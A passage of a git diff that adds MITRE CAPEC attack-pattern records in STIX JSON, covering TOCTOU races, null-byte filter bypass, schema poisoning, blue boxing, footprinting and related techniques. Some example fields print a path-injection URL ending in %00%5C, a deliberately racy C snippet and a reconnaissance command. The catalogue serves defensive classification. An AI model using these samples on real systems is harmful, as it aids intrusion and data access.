\"db_dump.php\" file in it. This sensitive data should not be disclosed publicly.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.", + "The adversary must be able to control the path that is requested of the target.", + "The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.", + "The server version or patch level must not inherently prevent known directory listing attacks from working." + ], + "x_capec_resources_required": [ + "Ability to send HTTP requests to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass the access control of the directory of listings", + "Low": "To issue the request to URL without given a specific file name" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2.json b/capec/attack-pattern/attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2.json new file mode 100644 index 0000000000..6b1e0398da --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2.json @@ -0,0 +1,120 @@ +{ + "type": "bundle", + "id": "bundle--5d5398f0-a304-46de-8d26-d8a659b13deb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions", + "description": "This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by \"running the race\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/29.html", + "external_id": "CAPEC-29" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/367.html", + "external_id": "CWE-367" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/368.html", + "external_id": "CWE-368" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/366.html", + "external_id": "CWE-366" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/370.html", + "external_id": "CWE-370" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/362.html", + "external_id": "CWE-362" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html", + "external_id": "CWE-662" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/691.html", + "external_id": "CWE-691" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/663.html", + "external_id": "CWE-663" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/665.html", + "external_id": "CWE-665" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1598", + "external_id": "REF-107" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Alter Execution Logic", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges", + "Alter Execution Logic", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Alter Execution Logic" + ] + }, + "x_capec_example_instances": [ + "The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057", + "\n The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an adversary can replace the file referenced by the name.\n include include include \n define FILE \"/tmp/myfile\"define UID 100\n void test(char *str){int fd;fd = creat(FILE, 0644);if(fd == -1)return;\n chown(FILE, UID, -1); /* BAD */close(fd);\n }\n int main(int argc, char **argv){char *userstr;if(argc > 1) {userstr = argv[1];test(userstr);\n }return 0;\n }\n [R.29.3]\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A resource is access/modified concurrently by multiple processes.", + "The adversary is able to modify resource.", + "A race condition exists while accessing a resource." + ], + "x_capec_skills_required": { + "Medium": "This attack can get sophisticated since the attack has to occur within a short interval of time." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530.json b/capec/attack-pattern/attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530.json new file mode 100644 index 0000000000..a430da6820 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--41777302-70dc-4427-82a5-64e0075d0b50", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Blue Boxing", + "description": "This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/5.html", + "external_id": "CAPEC-5" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "System must use weak authentication mechanisms for administrative functions." + ], + "x_capec_resources_required": [ + "CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch" + ], + "x_capec_skills_required": { + "Low": "Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6d245dc1-418f-45a5-ba1d-33c45ef0b20f.json b/capec/attack-pattern/attack-pattern--6d245dc1-418f-45a5-ba1d-33c45ef0b20f.json new file mode 100644 index 0000000000..caefceabfa --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6d245dc1-418f-45a5-ba1d-33c45ef0b20f.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--4f9c8363-f062-4991-82b3-2fdb73d779f6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6d245dc1-418f-45a5-ba1d-33c45ef0b20f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Install New Service", + "description": "When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html", + "external_id": "CAPEC-550" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6dec6b3f-ecca-4764-af25-8db5ed7373a0.json b/capec/attack-pattern/attack-pattern--6dec6b3f-ecca-4764-af25-8db5ed7373a0.json new file mode 100644 index 0000000000..75357d5d5c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6dec6b3f-ecca-4764-af25-8db5ed7373a0.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--5e8bffd8-bf24-48a3-b9be-59f1af3290ec", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6dec6b3f-ecca-4764-af25-8db5ed7373a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Establish Rogue Location", + "description": "An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/616.html", + "external_id": "CAPEC-616" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ], + "Integrity": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "A resource is expected to available to the user." + ], + "x_capec_skills_required": { + "Low": "Adversaries can often purchase low-cost technology to implement rogue access points." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6df707f1-14d4-40ff-a227-532afa9b48e3.json b/capec/attack-pattern/attack-pattern--6df707f1-14d4-40ff-a227-532afa9b48e3.json new file mode 100644 index 0000000000..96a82ecb09 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6df707f1-14d4-40ff-a227-532afa9b48e3.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--3e662ab7-1e1e-4b84-a378-89bd124a652f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6df707f1-14d4-40ff-a227-532afa9b48e3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html", + "external_id": "CAPEC-325" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e.json b/capec/attack-pattern/attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e.json new file mode 100644 index 0000000000..edecaefb24 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e.json @@ -0,0 +1,100 @@ +{ + "type": "bundle", + "id": "bundle--c7695498-de82-46be-a0c8-3da178223ee5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Postfix, Null Terminate, and Backslash", + "description": "If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an attacker to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/53.html", + "external_id": "CAPEC-53" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html", + "external_id": "CWE-158" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n A rather simple injection is possible in a URL:\n http://getAccessHostname/sekbin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here][%00][%5C]&chapter=\n This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Null terminators are not properly handled by the filter." + ], + "x_capec_skills_required": { + "Medium": "An attacker needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e.json b/capec/attack-pattern/attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e.json new file mode 100644 index 0000000000..fa96b77051 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--71be7276-91db-48ed-a9b0-de45aa196849", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Schema Poisoning", + "description": "An adversary corrupts or modifies the content of a schema for the purpose of undermining the security of the target. Schemas provide the structure and content definitions for resources used by an application. By replacing or modifying a schema, the adversary can affect how the application handles or interprets a resource, often leading to possible denial of service, entering into an unexpected state, or recording incomplete data.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/271.html", + "external_id": "CAPEC-271" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n In a JSON Schema Poisoning Attack, an adervary modifies the JSON schema to cause a Denial of Service (DOS) or to submit malicious input:\n { \"title\": \"Contact\", \"type\": \"object\", \"properties\": { \"Name\": { \"type\": \"string\" }, \"Phone\": { \"type\": \"string\" }, \"Email\": { \"type\": \"string\" }, \"Address\": { \"type\": \"string\" } }, \"required\": [\"Name\", \"Phone\", \"Email\", \"Address\"] }\n If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.\n ", + "\n In a Database Schema Poisoning Attack, an adversary alters the database schema being used to modify the database in some way. This can result in loss of data, DOS, or malicious input being submitted. Assuming there is a column named \"name\", an adversary could make the following schema change:\n ALTER TABLE Contacts MODIFY Name VARCHAR(65353);\n The \"Name\" field of the \"Conteacts\" table now allows the storing of names up to 65353 characters in length. This could allow the adversary to store excess data within the database to consume system resource or to execute a DOS.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of access to modify the target schema.", + "The schema used by the target application must be improperly secured against unauthorized modification and manipulation." + ], + "x_capec_resources_required": [ + "Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--70c66f49-bf61-442f-99a4-8456fce90a8b.json b/capec/attack-pattern/attack-pattern--70c66f49-bf61-442f-99a4-8456fce90a8b.json new file mode 100644 index 0000000000..36d1b917eb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--70c66f49-bf61-442f-99a4-8456fce90a8b.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--27280e9f-d832-41ac-939e-b442238ad2a8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--70c66f49-bf61-442f-99a4-8456fce90a8b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Owner Footprinting", + "description": "An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \"dir /A ntuser.dat\". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/577.html", + "external_id": "CAPEC-577" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.", + "Administrator permissions are required to view the home folder of other users." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11.json b/capec/attack-pattern/attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11.json new file mode 100644 index 0000000000..3157585062 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--34e1348b-42e5-4b77-895b-0718958f9a29", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "WiFi MAC Address Tracking", + "description": "In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/612.html", + "external_id": "CAPEC-612" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--70d1fa8a-114b-425a-9495-44bf53f0a19f.json b/capec/attack-pattern/attack-pattern--70d1fa8a-114b-425a-9495-44bf53f0a19f.json new file mode 100644 index 0000000000..e31e472f85 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--70d1fa8a-114b-425a-9495-44bf53f0a19f.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--0905101d-0a10-4014-a1f9-8b7cb6f35986", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--70d1fa8a-114b-425a-9495-44bf53f0a19f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modification During Manufacture", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html", + "external_id": "CAPEC-438" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57.json b/capec/attack-pattern/attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57.json new file mode 100644 index 0000000000..3a37b92585 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--454e9b28-27f8-4e09-917a-4928168ffda5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Windows ::DATA Alternate Data Stream", + "description": "An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \"files\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/168.html", + "external_id": "CAPEC-168" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/212.html", + "external_id": "CWE-212" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/69.html", + "external_id": "CWE-69" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target must be running the Microsoft NTFS file system." + ], + "x_capec_resources_required": [ + "The attacker must have command line or programmatic access to the target's files system with write/read permissions." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e.json b/capec/attack-pattern/attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e.json new file mode 100644 index 0000000000..1c7a1cc80d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e.json @@ -0,0 +1,108 @@ +{ + "type": 